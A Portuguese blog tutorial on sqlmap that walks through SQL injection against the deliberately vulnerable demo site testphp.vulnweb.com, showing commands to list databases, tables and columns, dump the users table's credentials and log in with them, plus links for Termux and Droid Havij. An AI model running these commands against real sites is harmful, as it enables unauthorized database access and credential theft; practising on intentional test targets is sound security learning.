᥀šŸ”„SQL MAP NA PRƁTICA - TUTORIAL DE COMO USAR CORRETAMENTE + TERMUX + SCRIPT/DROID HAVIJ᥀šŸ”„

O SQLMAP Ć© uma ferramenta de injeĆ§Ć£o SQL desenvolvida em Python, seu objetivo Ć© detectar e explorar vulnerabilidades de injeĆ§Ć£o SQL em aplicaƧƵes ou sites web, uma vez que se detecta uma ou mais injeƧƵes de SQL em um alvo, o usuĆ”rio pode escolher entre uma variedade de opƧƵes que o SQLMAP disponibiliza para explorar os dados armazenados dentro do banco de dados.


1ĀŗPASSO

Para realizar a execuĆ§Ć£o do SQLMAP Ć© necessĆ”rio utilizar um parĆ¢metro GET exemplo:www.site.com/index.php?id=1, entĆ£o para isso navegue no site ate encontrar a opĆ§Ć£o como no exemplo abaixo:


http://testphp.vulnweb.com/listproducts.php?cat=1

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –-dbs


2ĀŗPASSO

Durante o processo de execuĆ§Ć£o o SQLMAP jĆ” detecta que o banco de dados do site Ć© MySQL e vocĆŖ pode ser questionado se deseja pular a verificaĆ§Ć£o para outros tipos de banco de dados ou se vocĆŖ que fazer um teste mais profundo sobre o banco de dados detectado, neste caso responda Y (Yes/Sim).


3ĀŗPASSO

Neste momento o SQLMAP jĆ” detectou que o parĆ¢metro cat estĆ” vulnerĆ”vel e vocĆŖ Ć© questionado se deseja realizar outros testes, no momento selecione N (Not/NĆ£o).


4ĀŗPASSO

•Como pode visualizar os banco de dados sĆ£o exibidos:•

[*] acuart
[*] information_schema


5ĀŗPASSO

Agora que foram listados os banco de dados vamos extrair as tabelas do banco de dados acuart.


sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –-dbs -D acuart –-tables

-D :Define o banco de dados que serĆ” avaliado.

acuart : Banco de dados do site.

-–tables : Lista todas as tabelas do banco de dados informado.


6ĀŗPASSO

•Como resultado sĆ£o extraĆ­das 8 tabelas do banco de dados acuart.•
+ artists
+ carts
+ categ
+ featured
+ guestbook
+ pictures
+ products
+ users


7ĀŗPASSO
7ĀŗPASS
Vamos extrair todas as colunas existentes na tabela users.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –-dbs -D acuart -T users –-columns

-T : Define a tabela que serĆ” avaliada.

users : Tabela do banco de dados acuart.

-–columns : Lista todas as colunas da tabela users.


8ĀŗPASSO

•Como resultado sĆ£o extraĆ­das 8 colunas da tabelausers.•
+ address
+ cart
+ cc
+ email
+ name
+ pass
+ phone
+ uname
 

9ĀŗPASSO

Neste passo iremos realizar o DUMP ou seja extrair todas as informaƧƵes cadastradas nas colunas da tabela users.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 –-dbs -D acuart -T users -C name,pass,uname,email –-dump

-C : Define as colunas que serĆ” avaliada.

name,pass,uname,email : Lista das colunas da tabela users.

-–dump : Extrai todas as informaƧƵes contidas nas colunas da tabela informada.


10ĀŗPASSO

Segue abaixo todos os dados extraĆ­dos:
pass: test
name: John Smith
uname: test
email: email@email.com


11ĀŗPASSO

Munido das informaƧƵes extraƭdas realize o acesso ao sistema:

Site: testphp.vulnweb.com/login.php


Username: test
Password: test


12ĀŗPASSO

Login realizado com sucesso, basta confirmar as informaƧƵes.



꙳ ꦿDOWNLOAD TERMUX⸼

꙳ ꦿUSAR COM DROID HAVIJ⸼

꙳ ꦿINSTALAƇƃO SQLMAP⸼

Postar um comentƔrio

Post a Comment (0)

Postagem Anterior PrĆ³xima Postagem